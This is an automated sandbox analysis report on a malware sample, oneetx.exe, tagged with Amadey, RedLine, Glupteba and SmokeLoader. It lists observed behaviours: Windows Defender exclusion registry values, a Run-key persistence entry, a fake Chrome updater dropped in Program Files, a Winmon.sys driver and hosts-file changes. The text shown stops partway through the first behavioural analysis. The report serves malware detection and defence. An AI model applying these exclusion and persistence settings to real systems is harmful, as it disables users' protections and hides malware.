Malware Analysis Report

2025-08-06 03:39

Sample ID 230702-ajgeysbc4z
Target oneetx.exe
SHA256 563acabe49cc451e9caac20fae780bad27ea09aaefaaf8a1dfd838a00de97144
Tags
amadey gcleaner glupteba redline smokeloader 280623_rc_11 up3 backdoor discovery dropper evasion infostealer loader persistence rootkit spyware trojan upx
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V6

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

563acabe49cc451e9caac20fae780bad27ea09aaefaaf8a1dfd838a00de97144

Threat Level: Known bad

The file oneetx.exe was found to be: Known bad.

Malicious Activity Summary


Amadey

Glupteba

Glupteba payload

GCleaner

SmokeLoader

RedLine

Amadey family

Suspicious use of NtCreateUserProcessOtherParentProcess

Windows security bypass

Modifies boot configuration data using bcdedit

Stops running service(s)

Downloads MZ/PE file

Possible attempt to disable PatchGuard

Drops file in Drivers directory

Modifies Windows Firewall

Loads dropped DLL

Executes dropped EXE

UPX packed file

Windows security modification

Checks computer location settings

Accesses cryptocurrency files/wallets, possible credential harvesting

Adds Run key to start application

Checks installed software on the system

Manipulates WinMonFS driver.

Manipulates WinMon driver.

Drops file in System32 directory

Suspicious use of SetThreadContext

Launches sc.exe

Drops file in Windows directory

Drops file in Program Files directory

Checks for VirtualBox DLLs, possible anti-VM trick

Unsigned PE

Program crash

Enumerates physical storage devices

Suspicious use of FindShellTrayWindow

Uses Task Scheduler COM API

Suspicious use of WriteProcessMemory

Suspicious behavior: EnumeratesProcesses

Modifies system certificate store

Modifies data under HKEY_USERS

Suspicious behavior: MapViewOfSection

Creates scheduled task(s)

Kills process with taskkill

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: LoadsDriver

Suspicious behavior: GetForegroundWindowSpam

Checks SCSI registry key(s)

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-07-02 00:14

Signatures

Amadey family

amadey

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-07-02 00:14

Reported

2023-07-02 00:17

Platform

win7-20230621-en

Max time kernel

144s

Max time network

154s

Command Line

C:\Windows\Explorer.EXE

Signatures

Amadey

trojan amadey

GCleaner

loader gcleaner

Glupteba

loader dropper glupteba

Glupteba payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

RedLine

infostealer redline

SmokeLoader

trojan backdoor smokeloader

Suspicious use of NtCreateUserProcessOtherParentProcess

Description Indicator Process Target
PID 1044 created 1204 N/A C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe C:\Windows\Explorer.EXE
PID 1044 created 1204 N/A C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe C:\Windows\Explorer.EXE
PID 1044 created 1204 N/A C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe C:\Windows\Explorer.EXE
PID 1044 created 1204 N/A C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe C:\Windows\Explorer.EXE
PID 1044 created 1204 N/A C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe C:\Windows\Explorer.EXE
PID 1764 created 1204 N/A C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe C:\Windows\Explorer.EXE
PID 1764 created 1204 N/A C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe C:\Windows\Explorer.EXE
PID 1764 created 1204 N/A C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe C:\Windows\Explorer.EXE
PID 1764 created 1204 N/A C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe C:\Windows\Explorer.EXE
PID 1764 created 1204 N/A C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe C:\Windows\Explorer.EXE
PID 1576 created 1204 N/A C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe C:\Windows\Explorer.EXE
PID 1576 created 1204 N/A C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe C:\Windows\Explorer.EXE
PID 1576 created 1204 N/A C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe C:\Windows\Explorer.EXE
PID 1576 created 1204 N/A C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe C:\Windows\Explorer.EXE
PID 1576 created 1204 N/A C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe C:\Windows\Explorer.EXE
PID 2764 created 1204 N/A C:\Program Files\Google\Chrome\updater.exe C:\Windows\Explorer.EXE
PID 2764 created 1204 N/A C:\Program Files\Google\Chrome\updater.exe C:\Windows\Explorer.EXE
PID 2764 created 1204 N/A C:\Program Files\Google\Chrome\updater.exe C:\Windows\Explorer.EXE
PID 2764 created 1204 N/A C:\Program Files\Google\Chrome\updater.exe C:\Windows\Explorer.EXE
PID 2764 created 1204 N/A C:\Program Files\Google\Chrome\updater.exe C:\Windows\Explorer.EXE
PID 2764 created 1204 N/A C:\Program Files\Google\Chrome\updater.exe C:\Windows\Explorer.EXE

Windows security bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\3eef203fb515bda85f514e168abb5973.exe = "0" C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe N/A

Downloads MZ/PE file

Drops file in Drivers directory

Description Indicator Process Target
File created C:\Windows\System32\drivers\etc\hosts C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe N/A
File created C:\Windows\System32\drivers\etc\hosts C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe N/A
File created C:\Windows\system32\drivers\Winmon.sys C:\Windows\rss\csrss.exe N/A
File created C:\Windows\System32\drivers\etc\hosts C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe N/A
File created C:\Windows\System32\drivers\etc\hosts C:\Program Files\Google\Chrome\updater.exe N/A

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\netsh.exe N/A

Possible attempt to disable PatchGuard

evasion

Stops running service(s)

evasion

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000201001\setup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000186001\updEdge.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000202001\toolspub2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000202001\toolspub2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000186001\updEdge.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000186001\updEdge.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe N/A
N/A N/A C:\Windows\rss\csrss.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe N/A
N/A N/A C:\Windows\windefender.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe N/A
N/A N/A C:\Windows\windefender.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\f801950a962ddba14caaa44bf084b55c.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\oneetx.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000201001\setup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000201001\setup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000201001\setup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000202001\toolspub2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe N/A
N/A N/A N/A N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
N/A N/A C:\Windows\rss\csrss.exe N/A
N/A N/A C:\Windows\system32\taskeng.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
N/A N/A C:\Windows\rss\csrss.exe N/A
N/A N/A C:\Windows\rss\csrss.exe N/A
N/A N/A C:\Windows\rss\csrss.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Windows security modification

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\3eef203fb515bda85f514e168abb5973.exe = "0" C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3518257231-2980324860-1431329550-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3518257231-2980324860-1431329550-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" C:\Windows\rss\csrss.exe N/A

Checks installed software on the system

discovery

Manipulates WinMon driver.

rootkit evasion
Description Indicator Process Target
File opened for modification \??\WinMon C:\Windows\rss\csrss.exe N/A

Manipulates WinMonFS driver.

rootkit evasion
Description Indicator Process Target
File opened for modification \??\WinMonFS C:\Windows\rss\csrss.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Checks for VirtualBox DLLs, possible anti-VM trick

Description Indicator Process Target
File opened (read-only) \??\VBoxMiniRdrDN C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files\Google\Chrome\updater.exe C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe N/A
File created C:\Program Files\Google\Chrome\updater.exe C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe N/A
File created C:\Program Files\Google\Chrome\updater.exe C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe N/A
File created C:\Program Files\Google\Libs\WR64.sys C:\Program Files\Google\Chrome\updater.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\windefender.exe C:\Windows\rss\csrss.exe N/A
File created C:\Windows\Logs\CBS\CbsPersist_20230702001509.cab C:\Windows\system32\makecab.exe N/A
File opened for modification C:\Windows\rss C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe N/A
File created C:\Windows\rss\csrss.exe C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe N/A
File created C:\Windows\windefender.exe C:\Windows\rss\csrss.exe N/A

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\1000202001\toolspub2.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\1000202001\toolspub2.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\1000202001\toolspub2.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-242 = "Samoa Standard Time" C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-511 = "Central Asia Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-251 = "Dateline Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-532 = "Sri Lanka Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-571 = "China Daylight Time" C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-192 = "Mountain Standard Time" C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-662 = "Cen. Australia Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-141 = "Canada Central Daylight Time" C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-591 = "Malay Peninsula Daylight Time" C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-631 = "Tokyo Daylight Time" C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-201 = "US Mountain Daylight Time" C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-622 = "Korea Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-211 = "Pacific Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-122 = "SA Pacific Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-331 = "E. Europe Daylight Time" C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-441 = "Arabian Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-162 = "Central Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-471 = "Ekaterinburg Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-351 = "FLE Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-982 = "Kamchatka Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1021 = "Bangladesh Daylight Time" C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-871 = "Pakistan Daylight Time" C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-221 = "Alaskan Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-331 = "E. Europe Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-435 = "Georgian Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-181 = "Mountain Daylight Time (Mexico)" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-582 = "North Asia East Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-121 = "SA Pacific Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1022 = "Bangladesh Standard Time" C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-531 = "Sri Lanka Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-241 = "Samoa Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-262 = "GMT Standard Time" C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1042 = "Ulaanbaatar Standard Time" C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-104 = "Central Brazilian Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-692 = "Tasmania Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-651 = "AUS Central Daylight Time" C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-365 = "Middle East Standard Time" C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-82 = "Atlantic Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-31 = "Mid-Atlantic Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-962 = "Paraguay Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-381 = "South Africa Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-931 = "Coordinated Universal Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-652 = "AUS Central Standard Time" C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-52 = "Greenland Standard Time" C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-3 = "Microsoft Corporation" C:\Windows\system32\netsh.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-581 = "North Asia East Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-151 = "Central America Daylight Time" C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe N/A
